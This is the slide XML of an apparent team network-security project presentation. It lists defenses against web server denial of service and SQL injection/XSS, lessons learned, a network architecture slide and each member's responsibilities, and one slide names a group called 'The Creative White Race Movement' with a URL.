            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1293523"/>
            <a:ext cx="5638800" cy="439226"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 73206 h 439226"/>
              <a:gd name="connsiteX1" fmla="*/ 73206 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 439226"/>
              <a:gd name="connsiteX2" fmla="*/ 5565594 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 439226"/>
              <a:gd name="connsiteX3" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 73206 h 439226"/>
              <a:gd name="connsiteX4" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 366020 h 439226"/>
              <a:gd name="connsiteX5" fmla="*/ 5565594 w 5638800"/>
              <a:gd name="connsiteY5" fmla="*/ 439226 h 439226"/>
              <a:gd name="connsiteX6" fmla="*/ 73206 w 5638800"/>
              <a:gd name="connsiteY6" fmla="*/ 439226 h 439226"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY7" fmla="*/ 366020 h 439226"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY8" fmla="*/ 73206 h 43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439226">
                <a:moveTo>
                  <a:pt x="0" y="73206"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="32775"/>
                  <a:pt x="32775" y="0"/>
                  <a:pt x="73206" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5565594" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5606025" y="0"/>
                  <a:pt x="5638800" y="32775"/>
                  <a:pt x="5638800" y="73206"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5638800" y="366020"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5638800" y="406451"/>
                  <a:pt x="5606025" y="439226"/>
                  <a:pt x="5565594" y="439226"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="73206" y="439226"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="32775" y="439226"/>
                  <a:pt x="0" y="406451"/>
                  <a:pt x="0" y="366020"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="7320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021" tIns="90021" rIns="90021" bIns="90021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Web Server Denial of Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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57200" y="1732750"/>
            <a:ext cx="5638800" cy="1076400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1076400"/>
              <a:gd name="connsiteX1" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1076400"/>
              <a:gd name="connsiteX2" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 1076400 h 1076400"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 1076400 h 1076400"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 10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1076400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5638800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638800" y="1076400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1076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32" tIns="17780" rIns="99568" bIns="1778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Implement IPS to BAN captured IP addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1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Ensure FW blocks offending countries’ IP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Should be an indefinite ban</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" kern="12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17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57200" y="2809150"/>
            <a:ext cx="5638800" cy="475177"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 79198 h 475177"/>
              <a:gd name="connsiteX1" fmla="*/ 79198 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 475177"/>
              <a:gd name="connsiteX2" fmla="*/ 5559602 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 475177"/>
              <a:gd name="connsiteX3" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 79198 h 475177"/>
              <a:gd name="connsiteX4" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 395979 h 475177"/>
              <a:gd name="connsiteX5" fmla="*/ 5559602 w 5638800"/>
              <a:gd name="connsiteY5" fmla="*/ 475177 h 475177"/>
              <a:gd name="connsiteX6" fmla="*/ 79198 w 5638800"/>
              <a:gd name="connsiteY6" fmla="*/ 475177 h 475177"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY7" fmla="*/ 395979 h 475177"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY8" fmla="*/ 79198 h 47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38800" h="475177">
                <a:moveTo>
                  <a:pt x="0" y="79198"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="35458"/>
                  <a:pt x="35458" y="0"/>
                  <a:pt x="79198" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5559602" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5603342" y="0"/>
                  <a:pt x="5638800" y="35458"/>
                  <a:pt x="5638800" y="79198"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5638800" y="395979"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5638800" y="439719"/>
                  <a:pt x="5603342" y="475177"/>
                  <a:pt x="5559602" y="475177"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="79198" y="475177"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="35458" y="475177"/>
                  <a:pt x="0" y="439719"/>
                  <a:pt x="0" y="395979"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="791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776" tIns="91776" rIns="91776" bIns="9177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SQL Injection &amp; Cross-Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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457200" y="3284327"/>
            <a:ext cx="5638800" cy="1480049"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1480049"/>
              <a:gd name="connsiteX1" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1480049"/>
              <a:gd name="connsiteX2" fmla="*/ 5638800 w 5638800"/>
              <a:gd name="connsiteY2" fmla="*/ 1480049 h 1480049"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY3" fmla="*/ 1480049 h 1480049"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 5638800"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 148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1480049">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5638800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638800" y="1480049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14800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9032" tIns="17780" rIns="99568" bIns="17780" numCol="1" spcCol="1270" anchor="t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Develop front-end w. error-checking &amp; special character detection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Develop back-end w. prepared statements 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Configure IDS and IPS to notice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
              <a:t> and XSS signatures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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r>
              <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Eliminate all raw SQL statements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" b="0" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="67160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logging is quite handy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dirty="0" smtClean="0"/>
              <a:t>Recognizing stress on security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Critical nodes on network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="9438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Seasoned administrators are key components to livelihood of network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Networks still prone to internal attacks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Users are the weakest layer of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160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Defensive Measures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Lessons Learned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7196" y="2190750"/>
            <a:ext cx="3352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5884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5638800" cy="4098156"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Creative White </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Race Movement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="64008" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http://creative-white-race-movement.ca/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0750" y="514350"/>
            <a:ext cx="28384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16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4572000" cy="3429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Network Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11266" name="Picture 2" descr="https://lh4.googleusercontent.com/VYzh0Ssu_zcjZI4SeXjiz7XQ6njgw01igq5bMvq9vX2y2yVOwErGkIBTmZJV9iiH-FkHaTBByQWxrQAo5kCOThlFiNFLom5EewZbNWbYeQGZGvZ_c8tGfkBkrh80KyeDu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1504950"/>
            <a:ext cx="7769225" cy="3399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9690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153400" cy="3962400"/>
          </a:xfrm>
        </p:spPr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en-US" dirty="0" smtClean="0"/>
              <a:t>Team Member Responsibilities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/>
          </a:p>
          <a:p>
            <a:pPr marL="64008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64008" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>*All members contributed to Log and Alert Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Freeform 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1247654" y="2026758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5" tIns="64008" rIns="64009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Network Hosting &amp; Maintenance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Freeform 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1247654" y="2819385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6285"/>
              <a:satOff val="-4016"/>
              <a:lumOff val="-398"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-166285"/>
              <a:satOff val="-4016"/>
              <a:lumOff val="-398"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-166285"/>
              <a:satOff val="-4016"/>
              <a:lumOff val="-39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5" tIns="64008" rIns="64009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Snort, FW, SSH &amp;  Switch Administration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Freeform 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1247654" y="3612012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332570"/>
              <a:satOff val="-8033"/>
              <a:lumOff val="-796"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-332570"/>
              <a:satOff val="-8033"/>
              <a:lumOff val="-796"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-332570"/>
              <a:satOff val="-8033"/>
              <a:lumOff val="-796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5" tIns="64008" rIns="64009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Firewall / IDS Server Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Freeform 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613869" y="1709866"/>
            <a:ext cx="792230" cy="792230"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 792230"/>
              <a:gd name="connsiteY0" fmla="*/ 396115 h 792230"/>
              <a:gd name="connsiteX1" fmla="*/ 396115 w 792230"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 792230"/>
              <a:gd name="connsiteX2" fmla="*/ 792230 w 792230"/>
              <a:gd name="connsiteY2" fmla="*/ 396115 h 792230"/>
              <a:gd name="connsiteX3" fmla="*/ 396115 w 792230"/>
              <a:gd name="connsiteY3" fmla="*/ 792230 h 792230"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 792230"/>
              <a:gd name="connsiteY4" fmla="*/ 396115 h 79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230" h="792230">
                <a:moveTo>
                  <a:pt x="0" y="396115"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="177347"/>
                  <a:pt x="177347" y="0"/>
                  <a:pt x="396115" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="614883" y="0"/>
                  <a:pt x="792230" y="177347"/>
                  <a:pt x="792230" y="396115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="792230" y="614883"/>
                  <a:pt x="614883" y="792230"/>
                  <a:pt x="396115" y="792230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177347" y="792230"/>
                  <a:pt x="0" y="614883"/>
                  <a:pt x="0" y="396115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019" tIns="116019" rIns="116019" bIns="11601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 smtClean="0"/>
              <a:t>Peter Haile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Freeform 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228230" y="2026758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498856"/>
              <a:satOff val="-12049"/>
              <a:lumOff val="-1194"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-498856"/>
              <a:satOff val="-12049"/>
              <a:lumOff val="-1194"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-498856"/>
              <a:satOff val="-12049"/>
              <a:lumOff val="-1194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6" tIns="64008" rIns="64008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Remote Logging Administration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Freeform 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228230" y="2819385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665141"/>
              <a:satOff val="-16065"/>
              <a:lumOff val="-1592"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-665141"/>
              <a:satOff val="-16065"/>
              <a:lumOff val="-1592"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-665141"/>
              <a:satOff val="-16065"/>
              <a:lumOff val="-1592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6" tIns="64008" rIns="64008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Support Documentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Freeform 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228230" y="3612012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31426"/>
              <a:satOff val="-20081"/>
              <a:lumOff val="-1990"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-831426"/>
              <a:satOff val="-20081"/>
              <a:lumOff val="-1990"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-831426"/>
              <a:satOff val="-20081"/>
              <a:lumOff val="-199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6" tIns="64008" rIns="64008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Windows WS Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Freeform 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2594446" y="1709866"/>
            <a:ext cx="792230" cy="792230"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 792230"/>
              <a:gd name="connsiteY0" fmla="*/ 396115 h 792230"/>
              <a:gd name="connsiteX1" fmla="*/ 396115 w 792230"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 792230"/>
              <a:gd name="connsiteX2" fmla="*/ 792230 w 792230"/>
              <a:gd name="connsiteY2" fmla="*/ 396115 h 792230"/>
              <a:gd name="connsiteX3" fmla="*/ 396115 w 792230"/>
              <a:gd name="connsiteY3" fmla="*/ 792230 h 792230"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 792230"/>
              <a:gd name="connsiteY4" fmla="*/ 396115 h 79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230" h="792230">
                <a:moveTo>
                  <a:pt x="0" y="396115"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="177347"/>
                  <a:pt x="177347" y="0"/>
                  <a:pt x="396115" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="614883" y="0"/>
                  <a:pt x="792230" y="177347"/>
                  <a:pt x="792230" y="396115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="792230" y="614883"/>
                  <a:pt x="614883" y="792230"/>
                  <a:pt x="396115" y="792230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177347" y="792230"/>
                  <a:pt x="0" y="614883"/>
                  <a:pt x="0" y="396115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508499"/>
              <a:satOff val="0"/>
              <a:lumOff val="-4706"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2">
              <a:hueOff val="-508499"/>
              <a:satOff val="0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019" tIns="116019" rIns="116019" bIns="11601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 err="1" smtClean="0"/>
              <a:t>Nabeel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Lalji</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Freeform 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5208807" y="2026758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997711"/>
              <a:satOff val="-24098"/>
              <a:lumOff val="-2389"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-997711"/>
              <a:satOff val="-24098"/>
              <a:lumOff val="-2389"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-997711"/>
              <a:satOff val="-24098"/>
              <a:lumOff val="-238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6" tIns="64008" rIns="64008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Time Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Freeform 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5208807" y="2819385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163997"/>
              <a:satOff val="-28114"/>
              <a:lumOff val="-2787"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-1163997"/>
              <a:satOff val="-28114"/>
              <a:lumOff val="-2787"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-1163997"/>
              <a:satOff val="-28114"/>
              <a:lumOff val="-2787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6" tIns="64008" rIns="64008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Weekly Network Checks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Freeform 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207030" y="3612012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330282"/>
              <a:satOff val="-32130"/>
              <a:lumOff val="-3185"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-1330282"/>
              <a:satOff val="-32130"/>
              <a:lumOff val="-3185"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-1330282"/>
              <a:satOff val="-32130"/>
              <a:lumOff val="-318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6" tIns="64008" rIns="64008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Web Server Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Freeform 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4575023" y="1709866"/>
            <a:ext cx="792230" cy="792230"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 792230"/>
              <a:gd name="connsiteY0" fmla="*/ 396115 h 792230"/>
              <a:gd name="connsiteX1" fmla="*/ 396115 w 792230"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 792230"/>
              <a:gd name="connsiteX2" fmla="*/ 792230 w 792230"/>
              <a:gd name="connsiteY2" fmla="*/ 396115 h 792230"/>
              <a:gd name="connsiteX3" fmla="*/ 396115 w 792230"/>
              <a:gd name="connsiteY3" fmla="*/ 792230 h 792230"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 792230"/>
              <a:gd name="connsiteY4" fmla="*/ 396115 h 79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230" h="792230">
                <a:moveTo>
                  <a:pt x="0" y="396115"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="177347"/>
                  <a:pt x="177347" y="0"/>
                  <a:pt x="396115" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="614883" y="0"/>
                  <a:pt x="792230" y="177347"/>
                  <a:pt x="792230" y="396115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="792230" y="614883"/>
                  <a:pt x="614883" y="792230"/>
                  <a:pt x="396115" y="792230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177347" y="792230"/>
                  <a:pt x="0" y="614883"/>
                  <a:pt x="0" y="396115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16998"/>
              <a:satOff val="0"/>
              <a:lumOff val="-9412"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2">
              <a:hueOff val="-1016998"/>
              <a:satOff val="0"/>
              <a:lumOff val="-94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019" tIns="116019" rIns="116019" bIns="11601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 smtClean="0"/>
              <a:t>Cole Rees</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Freeform 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189384" y="2026758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496567"/>
              <a:satOff val="-36146"/>
              <a:lumOff val="-3583"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-1496567"/>
              <a:satOff val="-36146"/>
              <a:lumOff val="-3583"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-1496567"/>
              <a:satOff val="-36146"/>
              <a:lumOff val="-358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5" tIns="64008" rIns="64009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Website Design &amp; Implementation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Freeform 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189384" y="2819385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662852"/>
              <a:satOff val="-40163"/>
              <a:lumOff val="-3981"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-1662852"/>
              <a:satOff val="-40163"/>
              <a:lumOff val="-3981"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-1662852"/>
              <a:satOff val="-40163"/>
              <a:lumOff val="-398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5" tIns="64008" rIns="64009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Database Administration</a:t>
            </a:r>
